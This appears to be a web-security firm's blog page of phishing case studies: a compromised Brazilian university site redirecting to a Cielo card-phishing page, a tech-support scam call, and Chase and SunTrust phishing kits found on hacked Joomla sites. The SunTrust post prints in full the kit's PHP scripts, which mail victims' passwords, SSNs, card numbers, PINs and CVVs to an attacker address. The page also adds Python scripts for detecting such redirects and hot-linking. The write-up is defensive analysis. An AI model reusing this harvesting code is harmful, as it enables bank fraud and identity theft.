UNICAMP – Used to Host Phishing Pages

We just discovered that UNICAMP (Universidade Estadual de Campinas), a renowned Brazilian university, has had its infrastructure compromised: it is being used to host phishing pages whose links are then distributed in spear-phishing e-mail campaigns.

In this specific campaign the attackers appear to be after visitors' credit card information. We came across the issue while working on an infected site. The attacker had modified the site's .htaccess to redirect incoming traffic to the phishing files:

hxxp://www.cpa.unicamp.br/alcscens/as/public.php (The URL was slightly modified to avoid accidental clicks)
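As an added example (it is not code from the original post), here is a small Python check a site owner can run over an .htaccess file to spot the kind of change described above: a RewriteRule or Redirect directive whose target is an absolute URL on a host the site does not own. The sample .htaccess contents and both host names in it are constructed for illustration and are not from this incident; only the path under the phishing host mirrors the one seen here.

```python
import re
from urllib.parse import urlparse

# Constructed sample .htaccess (illustration only; not the compromised site's file).
# Line 4 sends visitors off to a third-party host, which is the change an attacker
# makes to push a site's traffic to a phishing kit; the other rules stay on-site.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\\. [NC]
RewriteRule ^(.*)$ http://www.example-phish.test/alcscens/as/public.php [R=302,L]
RewriteRule ^old-page$ /new-page [R=301,L]
Redirect 301 /promo https://www.our-own-site.test/promo
"""

# Apache directives that can send the client somewhere else.
REDIRECT_RE = re.compile(
    r'^\s*(RewriteRule|Redirect(?:Match|Permanent|Temp)?)\s+(?P<args>.*)$',
    re.IGNORECASE,
)


def find_external_redirects(htaccess_text, own_hosts):
    """Return [(line_no, target_host, directive_line)] for every redirect directive
    whose target is an absolute http(s) URL on a host that is not in own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for line_no, line in enumerate(htaccess_text.splitlines(), start=1):
        m = REDIRECT_RE.match(line)
        if not m:
            continue
        # Any argument of the directive may be the target; check each token.
        for token in m.group('args').split():
            parsed = urlparse(token)
            host = (parsed.hostname or '').lower()
            if parsed.scheme in ('http', 'https') and host and host not in own:
                findings.append((line_no, host, line.strip()))
    return findings


if __name__ == '__main__':
    for line_no, host, directive in find_external_redirects(
            SAMPLE_HTACCESS, {'www.our-own-site.test'}):
        print(f'line {line_no}: redirect to off-site host {host!r}: {directive}')
```

Any legitimate redirect to a partner or CDN host has to be added to own_hosts, and a real sweep should cover every .htaccess in the document root, not just the top-level one, since the phishing files here lived several directories deep.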

This link was leading to the following URL, which is still live. The content looks to have been cleaned up:

hxxp://www0.comprapremiadacielo.web-maker.kz/

This was a phishing page pretending to be from Cielo, one of the biggest electronic payment operators in Brazil. It pretended to offer promotions and discounts and requested the visitor's credit card information.

Here’s an image of the phishing page:

[Image: cielo-phishing – screenshot of the Cielo phishing page]

We also found a file containing an email message and a script to send emails to potential victims. Here's the content of the email file:

httx://www. cpa.unicamp.br/alcscens/as/public.phpios%20autenticado&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2%2cor.r_gc.r_pw.%2ccf.osb&fp=aa151a29d476e27c&pf=p&pdl=500
If you cannot see the images in this e-mail, click here: http://www.cpa.unicamp.br/alcscens/as/public.php

While there does not appear to be any evidence of other nefarious activity on the site, it is still best practice to avoid it until the University has had an opportunity to clean up.


Written by Magno Logan and Fio.

Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to over the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries show malicious warnings
  • Provide warnings to about 300,000 downloads per day
  • Send thousands of notifications daily to webmasters
  • Send thousands of notifications daily to Internet Service Providers (ISPs)


Read More

Phishing phone calls – Onlinesupport.com

It was early morning (around 8am) and I received a phone call from someone asking for me by name (using a private number and with a strong Indian accent):

Caller: "Hello, can I speak with XX?" (my real name)

Me: Sure, it is me.

Caller: Hello, I am calling from Online Support because there are some serious warnings coming from our Windows Server saying that your computer is compromised.

Me: Wow, it is?

At this point I was aware of what was going on. This group from India has been calling thousands of numbers, scaring people that their computer is compromised and convincing them to buy their service or install their software.

Read More

Chase phishing – case study

Last week we were called to fix a Joomla site that was infected by malware and disabled by their hosting company. The user forwarded the email he received:

Your account was reported to us by Google for malicious content and has been deactivated.

We ran a search on your account for the content that was reported and found files that contained malicious code. We created a text file that lists the files that we found the malicious code in and put it in your home directory; the file is called malware.txt. This file is not actually infected, it is an actual list of the problem files on your account based on Google's report. Please keep in mind that we cannot guarantee that this is a complete list of every possible issue that your account has, it is a list of what we found based on Google's report.

Nothing really unusual as we see this many times a day.

However, after some analysis of the site, we found a directory that didn’t look quite right. It was called “chase” and was inside another hidden directory called “.webservices”…

When we looked at the content, it had 3 files:

Read More

SunTrust phishing – case study

Last week we were called to fix a Joomla site that got blacklisted and had some malware on it. Nothing unusual as we do that many times a day. However, after some analysis of the site, we found a directory that didn’t look quite right.

That's what we found: /public_html/components/com_jsecure/SunTrust. Hmm… a "SunTrust" directory? That shouldn't be there.

When we looked at the content, it had 4 files:

$ ls -la 
index2.htm
index.htm
login.php
server.php

The index.htm was similar to the login page from SunTrust and asked for the user/pass of the person accessing it:


When the user submitted the form, it would load the login.php script:

<?php
// login.php: collects the credentials posted from index.htm and mails them to the attacker.
$ip = getenv("REMOTE_ADDR");
$message = "";
$message .= "------------------------------------------------------------------\n";
$message .= "USER ID : ".$_POST['uid']."\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Powered By SLim------------------------------\n";

$recipient = "peculiarhome@sify.com";
$subject = "SunTrust-Bank";
// The From header is built from an unvalidated form field.
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
    // Credentials sent; push the victim on to the second form.
    header("Location: index2.htm");
}
else
{
    echo "ERROR! Please go back and try again.";
}

This script sends the victim's user name and password to peculiarhome@sify.com. But that's not all: after that, it loads index2.htm, which asks the user for every piece of information possible:

Once that form is completed, the server.php script is loaded and sends all of that information to peculiarhome@sify.com:

<?php
// server.php: collects the second form (index2.htm) and mails it to the same address.
$ip = getenv("REMOTE_ADDR");
$message = "";
$message .= "------------------------------------------------------------------\n";
$message .= "Name On Account: ".$_POST['ucxATMCredentials:txtNAME']."\n";
$message .= "Social Security Number/TAX ID: ".$_POST['ucxATMCredentials:txtSSN']."\n";
$message .= "Account Number: ".$_POST['ucxATMCredentials:txtLast4DigitsOfAcct']."\n";
$message .= "Card Number: ".$_POST['ucxATMCredentials:txtATMPAN']."\n";
$message .= "Pin Number: ".$_POST['ucxATMCredentials:txtATMPin']."\n";
$message .= "Cvv2: ".$_POST['ucxATMCredentials:txtATMCvv2']."\n";
$message .= "Expiry Date: ".$_POST['ucxATMCredentials:txtExp']."\n";
$message .= "Mother's Maiden Name: ".$_POST['ucxATMCredentials:txtMMN']."\n";
$message .= "Date of Birth: ".$_POST['ucxATMCredentials:txtDOB']."\n";
$message .= "Email Address: ".$_POST['ucxATMCredentials:txtEmail']."\n";
$message .= "Email Password: ".$_POST['ucxATMCredentials:txtPass']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Powered By SLim------------------------------\n";

$recipient = "peculiarhome@sify.com";
$subject = "SunTrust-Bank info";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
    // Everything sent; bounce the victim to the real bank so nothing looks wrong.
    header("Location: https://www.suntrust.com/");
}
else
{
    echo "ERROR! Please go back and try again.";
}

Very nasty. We looked at all the logs and, since this directory was recent, we believe no one was harmed through it.

Solving phishing
For the banks out there, I recommend that you check your logs and look at the referrers of the images being loaded. In the example we analyzed, the images and CSS files were being loaded directly from the SunTrust site, so if SunTrust had been analyzing its logs it would have detected the phishing page.
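As an added example (not code from the original post, and not anything SunTrust runs), here is the log check recommended above, written in Python: it walks a web server access log in the common "combined" format and lists every off-site page that is hot-linking the bank's images, stylesheets or scripts, which is exactly what a cloned login page does. The log lines are constructed for illustration; victim-site.test is a placeholder host, the path on it is the one found on the compromised Joomla site, and the regex assumes the combined log format. The own_hosts set must include every hostname, CDN included, from which the bank legitimately serves pages.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Apache/nginx "combined" log format (assumed; adjust the regex for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Resources a cloned login page typically hot-links from the real site.
STATIC_EXT = ('.png', '.gif', '.jpg', '.jpeg', '.css', '.js', '.ico', '.svg')

# Constructed sample of what the bank's own access log might contain.
# The second and third lines are the tell: the bank's logo and stylesheet
# requested with a Referer on a host the bank does not own.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2012:08:01:12 -0400] "GET /images/logo.gif HTTP/1.1" 200 5120 "https://www.suntrust.com/" "Mozilla/5.0"
198.51.100.23 - - [10/Jun/2012:08:02:30 -0400] "GET /images/logo.gif HTTP/1.1" 200 5120 "http://victim-site.test/components/com_jsecure/SunTrust/index.htm" "Mozilla/5.0"
198.51.100.23 - - [10/Jun/2012:08:02:31 -0400] "GET /css/login.css HTTP/1.1" 200 2048 "http://victim-site.test/components/com_jsecure/SunTrust/index.htm" "Mozilla/5.0"
192.0.2.9 - - [10/Jun/2012:08:03:00 -0400] "GET /images/logo.gif HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Jun/2012:08:04:00 -0400] "GET /index.html HTTP/1.1" 200 9000 "http://victim-site.test/some/page" "Mozilla/5.0"
"""


def foreign_asset_referrers(log_text, own_hosts):
    """Count static-asset requests whose Referer is on a host outside own_hosts.
    Returns a Counter keyed by (referrer_host, referrer_path)."""
    own = {h.lower() for h in own_hosts}
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real tool would report it
        path = m.group('path').split('?', 1)[0].lower()
        if not path.endswith(STATIC_EXT):
            continue  # only images/CSS/JS are hot-linked by a clone
        referer = m.group('referer')
        if referer in ('', '-'):
            continue  # no Referer (direct load or stripped); nothing to attribute
        ref = urlparse(referer)
        host = (ref.hostname or '').lower()
        if host and host not in own:
            hits[(host, ref.path)] += 1
    return hits


if __name__ == '__main__':
    found = foreign_asset_referrers(SAMPLE_LOG, {'www.suntrust.com', 'suntrust.com'})
    for (host, page), n in found.most_common():
        print(f'{n:4d} asset hits referred from {host}{page}')
```

Requests with no Referer are skipped rather than flagged, since browsers and privacy proxies strip it routinely; the signal is the off-site page that does send one, and each such host/path pair is a candidate phishing page to take down.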

For the web masters and site owners out there: Keep your sites updated, use good passwords and monitor your sites!

As always, if you need help to recover from web attacks or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.